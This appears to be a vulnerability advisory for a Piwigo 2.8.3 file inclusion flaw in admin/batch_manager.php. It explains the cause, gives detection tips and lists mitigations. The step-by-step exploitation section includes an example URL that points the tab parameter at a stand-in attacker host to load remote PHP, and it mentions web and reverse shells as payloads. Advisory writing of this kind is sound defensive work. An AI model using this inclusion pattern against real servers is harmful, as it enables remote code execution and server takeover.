Source: cve@mitre.org
admin/batch_manager.php in Piwigo through 2.8.3 allows remote authenticated administrators to conduct File Inclusion attacks via the $page['tab'] variable (aka the mode parameter).
Piwigo versions 2.8.3 and below are vulnerable to a critical File Inclusion vulnerability, allowing authenticated administrators to execute arbitrary PHP code. This flaw enables attackers to gain complete control over the web server, potentially leading to data breaches and system compromise.
Step 1: Authentication: The attacker must first authenticate as an administrator within the Piwigo instance. This could be achieved through compromised credentials or other vulnerabilities.
Step 2: Payload Construction: The attacker crafts a malicious PHP file containing the desired payload (e.g., a web shell, reverse shell). This file is hosted on a server controlled by the attacker.
Step 3: Exploit Delivery: The attacker crafts a URL that exploits the vulnerability. The URL includes the admin/batch_manager.php script and sets the tab parameter to the URL of the attacker's malicious PHP file (e.g., http://target/piwigo/admin/batch_manager.php?tab=http://attacker.com/malicious.php).
Step 4: Code Execution: When the vulnerable script processes the request, it includes the attacker's PHP file using require_once. This executes the attacker's code on the server.
Step 5: Post-Exploitation: The attacker's code is executed, granting them control over the server, which can be used for further exploitation, such as data exfiltration or lateral movement.
The vulnerability stems from insufficient input validation within admin/batch_manager.php. The script directly incorporates the $_GET['tab'] variable into a require_once statement without proper sanitization. This allows an authenticated administrator to specify a malicious PHP file, which is then executed by the server. The root cause is a lack of input validation and output encoding, specifically failing to validate the $page['tab'] parameter. This allows for arbitrary code execution by including a malicious file. The script's design assumes the tab parameter will always point to a legitimate file within the Piwigo directory structure, but it does not enforce this assumption.
While no specific APT groups are directly linked to this CVE, the ease of exploitation makes it attractive to various threat actors. The impact is significant, and the vulnerability could be used as part of a larger attack chain. CISA KEV: Not Listed
Monitor web server access logs for suspicious requests to admin/batch_manager.php with unusual tab parameter values (e.g., URLs pointing to external servers or files outside the expected directory).
Analyze PHP error logs for errors related to file inclusion or execution of unexpected files.
Implement file integrity monitoring to detect changes to core Piwigo files or the creation of new files in unexpected locations.
Network traffic analysis: Look for outbound connections from the web server to suspicious IP addresses or domains, especially after a request to admin/batch_manager.php.
Upgrade to Piwigo version 2.8.4 or later, which includes a fix for this vulnerability.
Implement strict input validation and sanitization for all user-supplied input, especially the tab parameter in admin/batch_manager.php. This should include whitelisting allowed file paths or using a secure include mechanism.
Restrict administrator access to the Piwigo admin panel to only trusted users and networks.
Regularly scan the web server for known vulnerabilities and misconfigurations.
Implement a Web Application Firewall (WAF) to filter malicious requests and prevent exploitation attempts.
Review and harden the PHP configuration, disabling dangerous functions such as eval() and system() if not required.